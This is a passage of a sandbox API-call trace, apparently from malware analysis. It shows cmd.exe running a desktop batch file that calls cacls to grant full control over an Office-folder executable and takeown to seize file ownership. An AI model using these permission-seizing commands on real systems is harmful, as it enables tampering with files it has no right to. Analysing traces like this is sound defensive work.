lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0xffffffff [0206.514] GetLastError () returned 0x2 [0206.514] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.514] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0xffffffff [0206.514] GetLastError () returned 0x2 [0206.514] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0206.514] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.*", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0x125c8d8 [0206.514] FindClose (in: hFindFile=0x125c8d8 | out: hFindFile=0x125c8d8) returned 1 [0206.514] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0xffffffff [0206.515] GetLastError () returned 0x2 [0206.515] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0xfce3f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfce3f0) returned 0x125c8d8 [0206.515] FindClose (in: hFindFile=0x125c8d8 | out: hFindFile=0x125c8d8) returned 1 [0206.515] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0206.515] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0206.515] GetConsoleTitleW (in: lpConsoleTitle=0xfce8e4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0206.517] InitializeProcThreadAttributeList (in: lpAttributeList=0xfce810, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xfce7f4 | out: lpAttributeList=0xfce810, lpSize=0xfce7f4) returned 1 [0206.517] UpdateProcThreadAttribute (in: lpAttributeList=0xfce810, dwFlags=0x0, Attribute=0x60001, lpValue=0xfce7fc, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xfce810, lpPreviousValue=0x0) returned 1 [0206.517] GetStartupInfoW (in: lpStartupInfo=0xfce848 | out: lpStartupInfo=0xfce848*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0206.517] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0206.518] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0206.518] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0206.519] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="cacls \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpStartupInfo=0xfce798*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="cacls \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\" /E /G CIiHmnxMn6Ps:F /C", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xfce7e4 | out: lpCommandLine="cacls \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\" /E /G CIiHmnxMn6Ps:F /C", lpProcessInformation=0xfce7e4*(hProcess=0xb8, hThread=0xb0, dwProcessId=0x818, dwThreadId=0xe58)) returned 1 [0206.714] CloseHandle (hObject=0xb0) returned 1 [0206.714] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0206.714] GetEnvironmentStringsW () returned 0x1259de0* [0206.714] FreeEnvironmentStringsA (penv="=") returned 1 [0206.714] WaitForSingleObject (hHandle=0xb8, dwMilliseconds=0xffffffff) returned 0x0 [0208.040] GetExitCodeProcess (in: hProcess=0xb8, lpExitCode=0xfce77c | out: lpExitCode=0xfce77c*=0x0) returned 1 [0208.041] CloseHandle (hObject=0xb8) returned 1 [0208.041] _vsnwprintf (in: _Buffer=0xfce864, _BufferCount=0x13, _Format="%08X", _ArgList=0xfce784 | out: _Buffer="00000000") returned 8 [0208.041] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0208.041] GetEnvironmentStringsW () returned 0x125e388* [0208.041] FreeEnvironmentStringsA (penv="=") returned 1 [0208.041] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0208.041] GetEnvironmentStringsW () returned 0x125e388* [0208.041] FreeEnvironmentStringsA (penv="=") returned 1 [0208.041] DeleteProcThreadAttributeList (in: lpAttributeList=0xfce810 | out: lpAttributeList=0xfce810) [0208.041] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.041] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0208.041] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.041] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0208.041] _get_osfhandle (_FileHandle=0) returned 0x38 [0208.041] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0208.042] SetConsoleInputExeNameW () returned 0x1 [0208.042] GetConsoleOutputCP () returned 0x1b5 [0208.042] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0208.042] SetThreadUILanguage (LangId=0x0) returned 0x409 [0208.042] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vRnqNMBW.bat" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vrnqnmbw.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0xfcefa4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb8 [0208.042] _open_osfhandle (_OSFileHandle=0xb8, _Flags=8) returned 3 [0208.042] _get_osfhandle (_FileHandle=3) returned 0xb8 [0208.042] SetFilePointer (in: hFile=0xb8, lDistanceToMove=32, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0208.044] _get_osfhandle (_FileHandle=3) returned 0xb8 [0208.044] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x20 [0208.044] ReadFile (in: hFile=0xb8, lpBuffer=0x140a960, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0xfcef74, lpOverlapped=0x0 | out: lpBuffer=0x140a960*, lpNumberOfBytesRead=0xfcef74*=0xc2, lpOverlapped=0x0) returned 1 [0208.045] SetFilePointer (in: hFile=0xb8, lDistanceToMove=47, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0208.045] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x140a960, cbMultiByte=15, lpWideCharStr=0x13f57e0, cchWideChar=8191 | out: lpWideCharStr="takeown /F %1\r\n%USERNAME%:F /C\r\n") returned 15 [0208.045] _get_osfhandle (_FileHandle=3) returned 0xb8 [0208.045] GetFileType (hFile=0xb8) returned 0x1 [0208.045] _get_osfhandle (_FileHandle=3) returned 0xb8 [0208.045] SetFilePointer (in: hFile=0xb8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2f [0208.045] _wcsicmp (_String1="takeown", _String2=")") returned 75 [0208.045] _wcsicmp (_String1="FOR", _String2="takeown") returned -14 [0208.045] _wcsicmp (_String1="FOR/?", _String2="takeown") returned -14 [0208.045] _wcsicmp (_String1="IF", _String2="takeown") returned -11 [0208.045] _wcsicmp (_String1="IF/?", _String2="takeown") returned -11 [0208.045] _wcsicmp (_String1="REM", _String2="takeown") returned -2 [0208.045] _wcsicmp (_String1="REM/?", _String2="takeown") returned -2 [0208.046] _tell (_FileHandle=3) returned 47 [0208.046] _close (_FileHandle=3) returned 0 [0208.047] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfced38 | out: _Buffer="\r\n") returned 2 [0208.047] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.047] GetFileType (hFile=0x3c) returned 0x2 [0208.047] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0208.047] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfced10 | out: lpMode=0xfced10) returned 1 [0208.047] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.047] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfced28, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfced28*=0x2) returned 1 [0208.047] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0208.047] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0208.047] _vsnwprintf (in: _Buffer=0x13f9be0, _BufferCount=0x3fe, _Format="%s", _ArgList=0xfced34 | out: _Buffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 29 [0208.047] _vsnwprintf (in: _Buffer=0x13f9c1a, _BufferCount=0x3e1, _Format="%c", _ArgList=0xfced34 | out: _Buffer=">") returned 1 [0208.047] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.047] GetFileType (hFile=0x3c) returned 0x2 [0208.047] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0208.047] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfced14 | out: lpMode=0xfced14) returned 1 [0208.047] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.048] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x13f9be0*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xfced2c, lpReserved=0x0 | out: lpBuffer=0x13f9be0*, lpNumberOfCharsWritten=0xfced2c*=0x1e) returned 1 [0208.048] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.048] GetFileType (hFile=0x3c) returned 0x2 [0208.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0208.048] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefb4 | out: lpMode=0xfcefb4) returned 1 [0208.048] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.048] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12578c0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0xfcefcc, lpReserved=0x0 | out: lpBuffer=0x12578c0*, lpNumberOfCharsWritten=0xfcefcc*=0x7) returned 1 [0208.048] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xfcefd4 | out: _Buffer=" /F \"C:\\Program Files\\Microsoft Office 15\\alfred.exe\" ") returned 54 [0208.048] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.048] GetFileType (hFile=0x3c) returned 0x2 [0208.048] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0208.048] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefac | out: lpMode=0xfcefac) returned 1 [0208.048] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.048] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0xfcefc4, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefc4*=0x36) returned 1 [0208.049] _vsnwprintf (in: _Buffer=0x1406940, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xfcefe8 | out: _Buffer="\r\n") returned 2 [0208.049] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.049] GetFileType (hFile=0x3c) returned 0x2 [0208.049] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0208.049] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xfcefc0 | out: lpMode=0xfcefc0) returned 1 [0208.049] _get_osfhandle (_FileHandle=1) returned 0x3c [0208.049] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1406940*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xfcefd8, lpReserved=0x0 | out: lpBuffer=0x1406940*, lpNumberOfCharsWritten=0xfcefd8*=0x2) returned 1 [0208.049] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0208.049] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0208.049] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0208.049] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0208.049] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0208.049] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0208.049] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0208.049] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0208.049] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0208.049] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0208.049] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0208.049] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0208.049] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0208.049] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0208.049] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0208.049] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0208.049] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0208.049] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0208.049] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0208.049] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0208.050] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0208.050] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0208.050] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0208.050] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0208.050] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0208.050] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0208.050] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0208.050] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0208.050] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0208.050] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0208.050] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0208.050] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0208.050] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0208.050] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0208.050] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0208.050] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0208.050] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0208.050] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0208.050] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0208.050] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0208.050] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0208.050] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0208.050] _wcsnicmp (_String1="take", _String2="cmd ", _MaxCount=0x4) returned 17 [0208.050] SetErrorMode (uMode=0x0) returned 0x0 [0208.050] SetErrorMode (uMode=0x1) returned 0x0 [0208.050] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x125f970, lpFilePart=0xfced84 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0xfced84*="Desktop") returned 0x1d [0208.050] SetErrorMode (uMode=0x0) returned 0x1 [0208.050] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0208.050] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0208.051] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0208.051] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.051] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0xffffffff [0208.051] GetLastError () returned 0x2 [0208.051] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.051] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0xffffffff [0208.051] GetLastError () returned 0x2 [0208.051] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0208.051] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.*", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0x125cbc8 [0208.052] FindClose (in: hFindFile=0x125cbc8 | out: hFindFile=0x125cbc8) returned 1 [0208.052] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.COM", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0xffffffff [0208.052] GetLastError () returned 0x2 [0208.052] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\takeown.EXE", fInfoLevelId=0x1, lpFindFileData=0xfceb10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xfceb10) returned 0x125cbc8 [0208.052] FindClose (in: hFindFile=0x125cbc8 | out: hFindFile=0x125cbc8) returned 1 [0208.052] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0208.052] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0208.052] GetConsoleTitleW (in: lpConsoleTitle=0xfceb58, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0208.052] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0208.052] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0208.052] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0208.052] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0208.052] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0208.052] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0208.052] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0208.052] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0208.052] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0208.053] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0208.053] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0208.053] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0208.053] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0208.053] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0208.053] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0208.053] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0208.053] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0208.053] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0208.053] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0208.053] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0208.053] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0208.053] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0208.053] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0208.053] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0208.053] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0208.053] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0208.053] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0208.053] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0208.053] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0208.053] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0208.053] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0208.053] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0208.053] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0208.053] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0208.053] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0208.053] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0208.053] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0208.053] _wcsicmp (_String1="takeown", _String2="ASSOC") returned 19 [0208.053] _wcsicmp (_String1="takeown", _String2="FTYPE") returned 14 [0208.053] _wcsicmp (_String1="takeown", _String2="BREAK") returned 18 [0208.053] _wcsicmp (_String1="takeown", _String2="COLOR") returned 17 [0208.053] _wcsicmp (_String1="takeown", _String2="MKLINK") returned 7 [0208.053] _wcsicmp (_String1="takeown", _String2="DIR") returned 16 [0208.053] _wcsicmp (_String1="takeown", _String2="ERASE") returned 15 [0208.053] _wcsicmp (_String1="takeown", _String2="DEL") returned 16 [0208.053] _wcsicmp (_String1="takeown", _String2="TYPE") returned -24 [0208.053] _wcsicmp (_String1="takeown", _String2="COPY") returned 17 [0208.053] _wcsicmp (_String1="takeown", _String2="CD") returned 17 [0208.053] _wcsicmp (_String1="takeown", _String2="CHDIR") returned 17 [0208.053] _wcsicmp (_String1="takeown", _String2="RENAME") returned 2 [0208.053] _wcsicmp (_String1="takeown", _String2="REN") returned 2 [0208.054] _wcsicmp (_String1="takeown", _String2="ECHO") returned 15 [0208.054] _wcsicmp (_String1="takeown", _String2="SET") returned 1 [0208.054] _wcsicmp (_String1="takeown", _String2="PAUSE") returned 4 [0208.054] _wcsicmp (_String1="takeown", _String2="DATE") returned 16 [0208.054] _wcsicmp (_String1="takeown", _String2="TIME") returned -8 [0208.054] _wcsicmp (_String1="takeown", _String2="PROMPT") returned 4 [0208.054] _wcsicmp (_String1="takeown", _String2="MD") returned 7 [0208.054] _wcsicmp (_String1="takeown", _String2="MKDIR") returned 7 [0208.054] _wcsicmp (_String1="takeown", _String2="RD") returned 2 [0208.054] _wcsicmp (_String1="takeown", _String2="RMDIR") returned 2 [0208.054] _wcsicmp (_String1="takeown", _String2="PATH") returned 4 [0208.054] _wcsicmp (_String1="takeown", _String2="GOTO") returned 13 [0208.054] _wcsicmp (_String1="takeown", _String2="SHIFT") returned 1 [0208.054] _wcsicmp (_String1="takeown", _String2="CLS") returned 17 [0208.054] _wcsicmp (_String1="takeown", _String2="CALL") returned 17 [0208.054] _wcsicmp (_String1="takeown", _String2="VERIFY") returned -2 [0208.054] _wcsicmp (_String1="takeown", _String2="VER") returned -2 [0208.054] _wcsicmp (_String1="takeown", _String2="VOL") returned -2 [0208.054] _wcsicmp (_String1="takeown", _String2="EXIT") returned 15 [0208.054] _wcsicmp (_String1="takeown", _String2="SETLOCAL") returned 1 [0208.054] _wcsicmp (_String1="takeown", _String2="ENDLOCAL") returned 15 [0208.054] _wcsicmp (_String1="takeown", _String2="TITLE") returned -8 [0208.054] _wcsicmp (_String1="takeown", _String2="START") returned 1 [0208.054] _wcsicmp (_String1="takeown", _String2="DPATH") returned 16 [0208.054] _wcsicmp (_String1="takeown", _String2="KEYS") returned 9 [0208.054] _wcsicmp (_String1="takeown", _String2="MOVE") returned 7 [0208.054] _wcsicmp (_String1="takeown", _String2="PUSHD") returned 4 [0208.054] _wcsicmp (_String1="takeown", _String2="POPD") returned 4 [0208.054] 